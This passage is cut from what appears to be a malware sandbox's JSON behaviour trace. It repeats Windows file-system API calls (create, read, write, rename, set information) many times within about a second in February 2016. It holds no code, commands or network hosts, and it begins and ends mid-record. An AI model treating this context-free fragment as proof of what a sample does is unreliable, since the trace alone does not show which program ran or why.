"2016-02-16 17:41:59,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,878", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,018", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,048", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,059", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,059", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,059", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,069", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,069", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,079", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,079", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,089", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,089", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,099", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,119", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,119", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,119", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,129", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,139", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,139", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,169", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,189", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", 